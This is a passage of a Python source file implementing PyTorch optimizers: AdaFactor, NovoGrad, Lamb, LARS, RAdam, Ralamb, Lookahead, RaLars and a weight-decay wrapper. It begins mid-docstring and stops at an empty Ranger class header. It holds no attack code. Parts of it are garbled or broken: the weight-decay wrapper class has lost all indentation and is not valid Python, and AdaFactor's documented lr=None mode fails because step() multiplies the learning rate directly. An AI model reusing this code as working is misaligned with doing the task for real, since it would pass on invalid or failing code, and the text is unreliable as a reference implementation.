    # inspired but modified from https://github.com/DeadAt0m/adafactor-pytorch

    When ``enable_factorization`` is on, the second-moment estimate of a
    matrix-shaped parameter is stored as one row vector and one column vector
    (outer-product reconstruction) instead of a full matrix; tensors with more
    than two dims are first reshaped to 2-D.  ``lr=None`` combined with
    ``eps2`` gives the relative step size of the paper.

    Example:
        >>> model = LSTM()
        >>> optimizer = AdaFactor(model.parameters(),lr= lr)
    '''

    def __init__(self, params, lr=None, beta1=0.9, beta2=0.999, eps1=1e-30,
                 eps2=1e-3, cliping_threshold=1, non_constant_decay=True,
                 enable_factorization=True, ams_grad=True, weight_decay=0):
        # Momentum is implicitly disabled by beta1 == 0.
        enable_momentum = beta1 != 0
        # Time-dependent beta decay and AMSGrad are mutually exclusive here.
        if non_constant_decay:
            ams_grad = False
        defaults = dict(lr=lr, beta1=beta1, beta2=beta2, eps1=eps1,
                        eps2=eps2, cliping_threshold=cliping_threshold,
                        weight_decay=weight_decay, ams_grad=ams_grad,
                        enable_factorization=enable_factorization,
                        enable_momentum=enable_momentum,
                        non_constant_decay=non_constant_decay)
        super(AdaFactor, self).__init__(params, defaults)

    def __setstate__(self, state):
        super(AdaFactor, self).__setstate__(state)

    def _experimental_reshape(self, shape):
        # Collapse an N-D shape (N > 2) into a 2-D shape so the factored
        # second moment can be applied; returns (new_shape, original_shape).
        temp_shape = shape[2:]
        if len(temp_shape) == 1:
            new_shape = (shape[0], shape[1]*shape[2])
        else:
            tmp_div = len(temp_shape) // 2 + len(temp_shape) % 2
            new_shape = (shape[0]*functools.reduce(operator.mul,
                                                   temp_shape[tmp_div:], 1),
                         shape[1]*functools.reduce(operator.mul,
                                                   temp_shape[:tmp_div], 1))
        return new_shape, copy(shape)

    def _check_shape(self, shape):
        '''
        output1 - True - algorithm for matrix, False - vector;
        output2 - need reshape
        '''
        # NOTE(review): the third branch (len == 2 and a unit dim) is
        # unreachable -- the preceding `elif len(shape) == 2` already
        # catches every 2-D shape.  Behaviour is unchanged; flagging only.
        if len(shape) > 2:
            return True, True
        elif len(shape) == 2:
            return True, False
        elif len(shape) == 2 and (shape[0] == 1 or shape[1] == 1):
            return False, False
        else:
            return False, False

    def _rms(self, x):
        # Root-mean-square of a tensor (returned as a Python float).
        return sqrt(torch.mean(x.pow(2)))

    def step(self, closure=None):
        # Performs a single optimization step; `closure` optionally
        # re-evaluates the model and returns the loss.
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data

                if grad.is_sparse:
                    raise RuntimeError('Adam does not support sparse \
                        gradients, use SparseAdam instead')

                # Decide whether the factored (matrix) path applies and
                # whether the gradient must first be reshaped to 2-D.
                is_matrix, is_need_reshape = self._check_shape(grad.size())
                new_shape = p.data.size()
                if is_need_reshape and group['enable_factorization']:
                    new_shape, old_shape = \
                        self._experimental_reshape(p.data.size())
                    grad = grad.view(new_shape)

                state = self.state[p]
                if len(state) == 0:
                    state['step'] = 0
                    if group['enable_momentum']:
                        state['exp_avg'] = torch.zeros(new_shape,
                                                       dtype=torch.float32,
                                                       device=p.grad.device)

                    if is_matrix and group['enable_factorization']:
                        # Factored second moment: one row vector (R) and one
                        # column vector (C) instead of a full matrix.
                        state['exp_avg_sq_R'] = \
                            torch.zeros((1, new_shape[1]),
                                        dtype=torch.float32,
                                        device=p.grad.device)
                        state['exp_avg_sq_C'] = \
                            torch.zeros((new_shape[0], 1),
                                        dtype=torch.float32,
                                        device=p.grad.device)
                    else:
                        state['exp_avg_sq'] = torch.zeros(new_shape,
                                                          dtype=torch.float32,
                                                          device=p.grad.device)
                    if group['ams_grad']:
                        state['exp_avg_sq_hat'] = \
                            torch.zeros(new_shape, dtype=torch.float32,
                                        device=p.grad.device)

                if group['enable_momentum']:
                    exp_avg = state['exp_avg']

                if is_matrix and group['enable_factorization']:
                    exp_avg_sq_r = state['exp_avg_sq_R']
                    exp_avg_sq_c = state['exp_avg_sq_C']
                else:
                    exp_avg_sq = state['exp_avg_sq']

                if group['ams_grad']:
                    exp_avg_sq_hat = state['exp_avg_sq_hat']

                state['step'] += 1
                # Relative step size: scale lr by max(eps2, RMS(weights)).
                lr_t = group['lr']
                lr_t *= max(group['eps2'], self._rms(p.data))

                if group['enable_momentum']:
                    if group['non_constant_decay']:
                        # Time-dependent beta1_t per the AdaFactor paper.
                        beta1_t = group['beta1'] * \
                                  (1 - group['beta1'] ** (state['step'] - 1)) \
                                  / (1 - group['beta1'] ** state['step'])
                    else:
                        beta1_t = group['beta1']
                    exp_avg.mul_(beta1_t).add_(1 - beta1_t, grad)

                if group['non_constant_decay']:
                    beta2_t = group['beta2'] * \
                              (1 - group['beta2'] ** (state['step'] - 1)) / \
                              (1 - group['beta2'] ** state['step'])
                else:
                    beta2_t = group['beta2']

                if is_matrix and group['enable_factorization']:
                    # Update the row/column statistics, then reconstruct the
                    # full second moment as their normalized outer product.
                    exp_avg_sq_r.mul_(beta2_t). \
                        add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
                                                    add_(group['eps1']),
                                                    dim=0, keepdim=True))
                    exp_avg_sq_c.mul_(beta2_t). \
                        add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
                                                    add_(group['eps1']),
                                                    dim=1, keepdim=True))
                    v = torch.mul(exp_avg_sq_c,
                                  exp_avg_sq_r).div_(torch.sum(exp_avg_sq_r))
                else:
                    exp_avg_sq.mul_(beta2_t). \
                        addcmul_(1 - beta2_t, grad, grad). \
                        add_((1 - beta2_t)*group['eps1'])
                    v = exp_avg_sq

                g = grad
                if group['enable_momentum']:
                    # Bias-corrected momentum.
                    g = torch.div(exp_avg, 1 - beta1_t ** state['step'])

                if group['ams_grad']:
                    torch.max(exp_avg_sq_hat, v, out=exp_avg_sq_hat)
                    v = exp_avg_sq_hat
                    u = torch.div(g, (torch.div(v, 1 - beta2_t **
                                                state['step'])).sqrt().add_(group['eps1']))
                else:
                    u = torch.div(g, v.sqrt())

                # Update clipping (section 6 of the paper): cap RMS(u).
                u.div_(max(1, self._rms(u) / group['cliping_threshold']))
                p.data.add_(-lr_t * (u.view(old_shape) if is_need_reshape and
                                     group['enable_factorization'] else u))

                if group['weight_decay'] != 0:
                    p.data.add_(-group['weight_decay'] * lr_t, p.data)

        return loss
class WeightDecayOptimizerWrapper(Optimizer):
'''
Example:
>>> from torch.optim import Adam
>>> model = LSTM()
>>> optimizer = WeightDecayOptimizerWrapper(Adam(model.parameters(),lr = 1e-3),weight_decay=0.05)
'''
def __init__(self, optimizer, weight_decay, change_with_lr = True):
self.optimizer = optimizer
if isinstance(weight_decay, (list, tuple)):
assert len(weight_decay) == len(self.optimizer.param_groups)
assert all((x >= 0 for x in weight_decay))
self.weight_decays = weight_decay
else:
assert weight_decay >= 0
self.weight_decays = [weight_decay] * \
len(self.optimizer.param_groups)
self.state = self.optimizer.state
self.change_with_lr = change_with_lr
def step(self, closure=None) -> None:
for group, weight_decay in zip(self.optimizer.param_groups, self.weight_decays):
for param in group['params']:
if param.grad is None or weight_decay == 0:
continue
if self.change_with_lr:
param.data = param.data.add(
-weight_decay * group['lr'], param.data)
else:
param.data.add_(-weight_decay, param.data)
self.optimizer.step()
def zero_grad(self) -> None:
self.optimizer.zero_grad()
def add_param_group(self, param_group):
self.optimizer.add_param_group(param_group)
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def state_dict(self):
return self.optimizer.state_dict()
def __repr__(self):
return self.optimizer.__repr__()
def __getstate__(self):
return self.optimizer.__getstate__()
def __setstate__(self, state):
self.optimizer.__setstate__(state)
self.state = self.optimizer.state
@property
def param_groups(self):
return self.optimizer.param_groups
class NovoGrad(Optimizer):
    """Implements NovoGrad algorithm (https://arxiv.org/abs/1905.11286).

    NovoGrad keeps a *per-layer* (scalar) second-moment estimate of the
    squared gradient norm instead of a per-weight one.

    Arguments:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float, optional): learning rate (default: 1e-2)
        betas (Tuple[float, float], optional): coefficients used for computing
            running averages of gradient and its square (default: (0.95, 0.98))
        eps (float, optional): term added to the denominator to improve
            numerical stability (default: 1e-8)
        weight_decay (float, optional): decoupled weight decay factor (default: 0)
        grad_averaging (bool, optional): scale the normalized gradient by
            (1 - beta1) before the momentum update (default: False)

    Example:
        >>> model = ResNet()
        >>> optimizer = NovoGrad(model.parameters(), lr=1e-2, weight_decay=1e-5)
    """

    def __init__(self, params, lr=0.01, betas=(0.95, 0.98), eps=1e-8,
                 weight_decay=0, grad_averaging=False):
        if lr < 0.0:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
                        grad_averaging=grad_averaging)
        super().__init__(params, defaults)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.

        Returns:
            The loss returned by ``closure`` if one was given, else ``None``.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('NovoGrad does not support sparse gradients')

                state = self.state[p]
                # Per-layer squared gradient norm (0-dim tensor).
                g_2 = torch.sum(grad ** 2)

                if len(state) == 0:
                    state['step'] = 0
                    state['moments'] = grad.div(g_2.sqrt() + group['eps']) + \
                                       group['weight_decay'] * p.data
                    # NOTE(review): this stores an alias of g_2, so on the
                    # very first step the EMA update below reads the
                    # already-scaled value -- preserved as-is; confirm intent.
                    state['grads_ema'] = g_2

                moments = state['moments']
                grads_ema = state['grads_ema']
                beta1, beta2 = group['betas']
                state['step'] += 1

                # EMA of the squared norm (keyword alpha replaces the
                # deprecated positional-alpha overload).
                grads_ema.mul_(beta2).add_(g_2, alpha=1 - beta2)

                denom = grads_ema.sqrt().add_(group['eps'])
                # NOTE(review): normalizes p.grad *in place* -- the caller's
                # gradient tensor is modified by this step.
                grad.div_(denom)
                # Decoupled weight decay added to the normalized gradient.
                if group['weight_decay'] != 0:
                    decayed_weights = torch.mul(p.data, group['weight_decay'])
                    grad.add_(decayed_weights)
                # Momentum --> SAG
                if group['grad_averaging']:
                    grad.mul_(1.0 - beta1)
                moments.mul_(beta1).add_(grad)  # velocity

                bias_correction1 = 1 - beta1 ** state['step']
                bias_correction2 = 1 - beta2 ** state['step']
                step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
                p.data.add_(moments, alpha=-step_size)
        return loss
class Lamb(Optimizer):
    """Implements the Lamb optimizer from https://arxiv.org/pdf/1904.00962v3.pdf

    Lamb is Adam with a LARS-style layer-wise trust ratio: every parameter
    tensor's Adam update is rescaled by ``clip(||w||) / ||update||`` before
    being applied.

    Args:
        params (iterable): iterable of parameters to optimize or dicts defining parameter groups
        lr (float, optional): learning rate
        betas (Tuple[float, float], optional): coefficients used for computing running
            averages of gradient and its square (default: (0.9, 0.999))
        eps (float, optional): term added to the denominator to improve numerical
            stability (default: 1e-8)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        scale_clip (tuple, optional): the lower and upper bounds for the weight norm
            in the local LR of LARS (default: ``(0, 10)``)

    Example:
        >>> model = ResNet()
        >>> optimizer = Lamb(model.parameters(), lr=1e-2, weight_decay=1e-5)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
                 scale_clip=None):
        if not 0.0 <= lr:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {}".format(eps))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
        super(Lamb, self).__init__(params, defaults)
        # LARS arguments
        self.scale_clip = scale_clip
        if self.scale_clip is None:
            self.scale_clip = (0, 10)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    # Fixed error message: it previously said "RAdam".
                    raise RuntimeError('Lamb does not support sparse gradients')
                state = self.state[p]
                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                beta1, beta2 = group['betas']
                state['step'] += 1
                # Decay the first and second moment running average coefficient.
                # Keyword overloads (alpha=/value=) replace the legacy
                # positional-scalar forms removed from recent PyTorch releases.
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                # Adam-style gradient term
                update = torch.zeros_like(p.data)
                denom = exp_avg_sq.sqrt().add_(group['eps'])
                update.addcdiv_(exp_avg, denom)
                # Weight decay (decoupled, added to the update term)
                if group['weight_decay'] != 0:
                    update.add_(p.data, alpha=group['weight_decay'])
                # LARS trust-ratio scaling
                p_norm = p.data.pow(2).sum().sqrt()
                update_norm = update.pow(2).sum().sqrt()
                phi_p = p_norm.clamp(*self.scale_clip)
                # Compute the local LR
                if phi_p == 0 or update_norm == 0:
                    local_lr = 1
                else:
                    local_lr = phi_p / update_norm
                state['local_lr'] = local_lr
                # float() because `alpha` must be a Python number, while
                # local_lr may be a 0-dim tensor.
                p.data.add_(update, alpha=-group['lr'] * float(local_lr))
        return loss
class Lars(Optimizer):
    r"""Implements the LARS optimizer from https://arxiv.org/pdf/1708.03888.pdf

    SGD with momentum where each parameter tensor's update is rescaled by the
    layer-wise trust ratio ``||w|| / ||update||``.

    Args:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float): learning rate
        momentum (float, optional): momentum factor (default: 0)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        dampening (float, optional): dampening for momentum (default: 0)
        nesterov (bool, optional): enables Nesterov momentum (default: False)
        scale_clip (tuple, optional): the lower and upper bounds for the weight norm
            in local LR of LARS

    Example:
        >>> model = ResNet()
        >>> optimizer = Lars(model.parameters(), lr=1e-2, weight_decay=1e-5)
    """

    def __init__(self, params, lr, momentum=0, dampening=0,
                 weight_decay=0, nesterov=False, scale_clip=None):
        if lr < 0.0:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if momentum < 0.0:
            raise ValueError("Invalid momentum value: {}".format(momentum))
        if weight_decay < 0.0:
            raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
        defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
                        weight_decay=weight_decay, nesterov=nesterov)
        if nesterov and (momentum <= 0 or dampening != 0):
            raise ValueError("Nesterov momentum requires a momentum and zero dampening")
        super(Lars, self).__init__(params, defaults)
        # LARS arguments
        self.scale_clip = scale_clip
        if self.scale_clip is None:
            self.scale_clip = (0, 10)

    def __setstate__(self, state):
        # Keep groups loaded from old checkpoints valid.
        super(Lars, self).__setstate__(state)
        for group in self.param_groups:
            group.setdefault('nesterov', False)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            weight_decay = group['weight_decay']
            momentum = group['momentum']
            dampening = group['dampening']
            nesterov = group['nesterov']
            for p in group['params']:
                if p.grad is None:
                    continue
                d_p = p.grad.data
                # Classic (coupled) L2 weight decay, folded into the gradient.
                # Keyword overloads replace the legacy positional-scalar
                # Tensor.add_ forms removed from recent PyTorch releases.
                if weight_decay != 0:
                    d_p.add_(p.data, alpha=weight_decay)
                if momentum != 0:
                    param_state = self.state[p]
                    if 'momentum_buffer' not in param_state:
                        # First step: seed the buffer with the raw gradient.
                        buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
                    else:
                        buf = param_state['momentum_buffer']
                        buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
                    if nesterov:
                        d_p = d_p.add(buf, alpha=momentum)
                    else:
                        d_p = buf
                # LARS trust-ratio scaling
                p_norm = p.data.pow(2).sum().sqrt()
                update_norm = d_p.pow(2).sum().sqrt()
                # Compute the local LR
                if p_norm == 0 or update_norm == 0:
                    local_lr = 1
                else:
                    local_lr = p_norm / update_norm
                # float() because `alpha` must be a Python number.
                p.data.add_(d_p, alpha=-group['lr'] * float(local_lr))
        return loss
#
class RAdam(Optimizer):
    """Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf

    Rectified Adam: falls back to unadapted momentum while the variance
    estimate is unreliable (small SMA length), then applies a variance
    rectification term.

    Args:
        params (iterable): iterable of parameters to optimize or dicts defining parameter groups
        lr (float, optional): learning rate
        betas (Tuple[float, float], optional): coefficients used for computing running
            averages of gradient and its square (default: (0.9, 0.999))
        eps (float, optional): term added to the denominator to improve numerical
            stability (default: 1e-8)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)

    Example:
        >>> model = ResNet()
        >>> optimizer = RAdam(model.parameters(), lr=0.001)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
        if not 0.0 <= lr:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {}".format(eps))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
        super(RAdam, self).__init__(params, defaults)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            # Get group-shared variables
            beta1, beta2 = group['betas']
            sma_inf = group.get('sma_inf')
            # Compute max length of SMA on first step
            if not isinstance(sma_inf, float):
                group['sma_inf'] = 2 / (1 - beta2) - 1
                sma_inf = group.get('sma_inf')
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('RAdam does not support sparse gradients')
                state = self.state[p]
                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                state['step'] += 1
                # Decay the first and second moment running average coefficient.
                # Keyword overloads (alpha=/value=) replace the legacy
                # positional-scalar forms removed from recent PyTorch releases.
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                # Bias corrections
                bias_correction1 = 1 - beta1 ** state['step']
                bias_correction2 = 1 - beta2 ** state['step']
                # Compute length of SMA
                sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
                # Weight decay (coupled, scaled by lr as in the original code)
                if group['weight_decay'] != 0:
                    p.data.add_(p.data, alpha=-group['lr'] * group['weight_decay'])
                if sma_t > 4:
                    # Variance rectification term
                    r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
                    # Adaptive momentum
                    p.data.addcdiv_(exp_avg / bias_correction1,
                                    (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']),
                                    value=-group['lr'] * r_t)
                else:
                    # Unadapted momentum
                    p.data.add_(exp_avg / bias_correction1, alpha=-group['lr'])
        return loss
class Ralamb(Optimizer):
    """RAdam + LARS: rectified Adam steps rescaled by a layer-wise trust ratio.

    Example:
        >>> model = ResNet()
        >>> optimizer = Ralamb(model.parameters(), lr=0.001)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
        # Cache of (step, N_sma, step_size) tuples, keyed by step % 10, so the
        # rectification term is not recomputed for every parameter tensor.
        self.buffer = [[None, None, None] for ind in range(10)]
        super(Ralamb, self).__init__(params, defaults)

    def __setstate__(self, state):
        super(Ralamb, self).__setstate__(state)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                # Work in fp32 even for fp16 parameters.
                grad = p.grad.data.float()
                if grad.is_sparse:
                    raise RuntimeError('Ralamb does not support sparse gradients')
                p_data_fp32 = p.data.float()
                state = self.state[p]
                if len(state) == 0:
                    state['step'] = 0
                    state['exp_avg'] = torch.zeros_like(p_data_fp32)
                    state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
                else:
                    state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
                    state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                beta1, beta2 = group['betas']
                # Decay the first and second moment running average coefficient.
                # Keyword overloads replace the legacy positional-scalar forms
                # removed from recent PyTorch releases.
                # m_t
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                # v_t
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                state['step'] += 1
                buffered = self.buffer[int(state['step'] % 10)]
                if state['step'] == buffered[0]:
                    N_sma, radam_step_size = buffered[1], buffered[2]
                else:
                    buffered[0] = state['step']
                    beta2_t = beta2 ** state['step']
                    N_sma_max = 2 / (1 - beta2) - 1
                    N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
                    buffered[1] = N_sma
                    # more conservative since it's an approximated value
                    if N_sma >= 5:
                        radam_step_size = math.sqrt(
                            (1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2)
                            / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
                    else:
                        radam_step_size = 1.0 / (1 - beta1 ** state['step'])
                    buffered[2] = radam_step_size
                if group['weight_decay'] != 0:
                    p_data_fp32.add_(p_data_fp32, alpha=-group['weight_decay'] * group['lr'])
                # Candidate updated weights, used only to size the trust ratio.
                radam_step = p_data_fp32.clone()
                if N_sma >= 5:
                    denom = exp_avg_sq.sqrt().add_(group['eps'])
                    radam_step.addcdiv_(exp_avg, denom, value=-radam_step_size * group['lr'])
                else:
                    radam_step.add_(exp_avg, alpha=-radam_step_size * group['lr'])
                radam_norm = radam_step.pow(2).sum().sqrt()
                weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
                if weight_norm == 0 or radam_norm == 0:
                    trust_ratio = 1
                else:
                    trust_ratio = weight_norm / radam_norm
                state['weight_norm'] = weight_norm
                state['adam_norm'] = radam_norm
                state['trust_ratio'] = trust_ratio
                # float() because value=/alpha= must be Python numbers.
                if N_sma >= 5:
                    p_data_fp32.addcdiv_(exp_avg, denom,
                                         value=-radam_step_size * group['lr'] * float(trust_ratio))
                else:
                    p_data_fp32.add_(exp_avg,
                                     alpha=-radam_step_size * group['lr'] * float(trust_ratio))
                p.data.copy_(p_data_fp32)
        return loss
class Lookahead(Optimizer):
    """A PyTorch implementation of the Lookahead optimizer from the paper
    "Lookahead Optimizer: k steps forward, 1 step back"
    (https://arxiv.org/abs/1907.08610).

    Wraps any base optimizer: every ``k`` fast steps, the slow weights are
    pulled toward the fast weights by a factor ``alpha`` and copied back.

    Example:
        >>> import torch.optim as optim
        >>> base_optimizer = optim.Adam(model.parameters(), lr=0.001)
        >>> optimizer = Lookahead(base_optimizer=base_optimizer, k=5, alpha=0.5)
    """

    def __init__(self, base_optimizer, alpha=0.5, k=6):
        if not 0.0 <= alpha <= 1.0:
            raise ValueError(f'Invalid slow update rate: {alpha}')
        if not 1 <= k:
            raise ValueError(f'Invalid lookahead steps: {k}')
        # NOTE(review): super().__init__ is deliberately not called here —
        # this wrapper shares the base optimizer's param_groups instead of
        # building its own; state_dict()/zero_grad() should go through
        # `base_optimizer`. Confirm before relying on Optimizer base methods.
        self.optimizer = base_optimizer
        self.param_groups = self.optimizer.param_groups
        self.alpha = alpha
        self.k = k
        for group in self.param_groups:
            group["step_counter"] = 0
        # One slow-weight copy per fast parameter.
        self.slow_weights = [[p.clone().detach() for p in group['params']]
                             for group in self.param_groups]
        for w in it.chain(*self.slow_weights):
            w.requires_grad = False

    def step(self, closure=None):
        # BUG FIX: the original evaluated `closure()` and then immediately
        # overwrote `loss` with the return value of `self.optimizer.step()`
        # (typically None), discarding the loss. Pass the closure through to
        # the wrapped optimizer instead, so it runs exactly once and the loss
        # is preserved.
        if closure is not None:
            loss = self.optimizer.step(closure)
        else:
            loss = self.optimizer.step()
        for group, slow_weights in zip(self.param_groups, self.slow_weights):
            group['step_counter'] += 1
            if group['step_counter'] % self.k != 0:
                continue
            for p, q in zip(group['params'], slow_weights):
                if p.grad is None:
                    continue
                # slow <- slow + alpha * (fast - slow); then fast <- slow.
                q.data.add_(p.data - q.data, alpha=self.alpha)
                p.data.copy_(q.data)
        return loss
class RaLars(Optimizer):
    """Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
    with optional Layer-wise adaptive Scaling from https://arxiv.org/pdf/1708.03888.pdf

    Args:
        params (iterable): iterable of parameters to optimize or dicts defining parameter groups
        lr (float, optional): learning rate
        betas (Tuple[float, float], optional): coefficients used for computing running
            averages of gradient and its square (default: (0.9, 0.999))
        eps (float, optional): term added to the denominator to improve numerical
            stability (default: 1e-8)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        scale_clip (tuple, optional): lower/upper bound for the weight norm used in
            the LARS local LR (default: ``(0, 10)``)

    Example:
        >>> model = ResNet()
        >>> optimizer = RaLars(model.parameters(), lr=0.001)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
                 scale_clip=None):
        if not 0.0 <= lr:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {}".format(eps))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
        super(RaLars, self).__init__(params, defaults)
        # LARS arguments
        self.scale_clip = scale_clip
        if self.scale_clip is None:
            self.scale_clip = (0, 10)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.
        """
        loss = None
        if closure is not None:
            loss = closure()
        for group in self.param_groups:
            # Get group-shared variables
            beta1, beta2 = group['betas']
            sma_inf = group.get('sma_inf')
            # Compute max length of SMA on first step
            if not isinstance(sma_inf, float):
                group['sma_inf'] = 2 / (1 - beta2) - 1
                sma_inf = group.get('sma_inf')
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    # Fixed error message: it previously said "RAdam".
                    raise RuntimeError('RaLars does not support sparse gradients')
                state = self.state[p]
                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                state['step'] += 1
                # Decay the first and second moment running average coefficient.
                # Keyword overloads replace the legacy positional-scalar forms
                # removed from recent PyTorch releases.
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                # Bias correction
                bias_correction1 = 1 - beta1 ** state['step']
                bias_correction2 = 1 - beta2 ** state['step']
                # Compute length of SMA
                sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
                update = torch.zeros_like(p.data)
                if sma_t > 4:
                    # Variance rectification term
                    r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
                    # Adaptive momentum
                    update.addcdiv_(exp_avg / bias_correction1,
                                    (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']),
                                    value=r_t)
                else:
                    # Unadapted momentum
                    update.add_(exp_avg / bias_correction1)
                # Weight decay
                if group['weight_decay'] != 0:
                    update.add_(p.data, alpha=group['weight_decay'])
                # LARS
                p_norm = p.data.pow(2).sum().sqrt()
                update_norm = update.pow(2).sum().sqrt()
                phi_p = p_norm.clamp(*self.scale_clip)
                # Compute the local LR
                if phi_p == 0 or update_norm == 0:
                    local_lr = 1
                else:
                    local_lr = phi_p / update_norm
                state['local_lr'] = local_lr
                # float() because `alpha` must be a Python number.
                p.data.add_(update, alpha=-group['lr'] * float(local_lr))
        return loss
class Ranger(Optimizer):
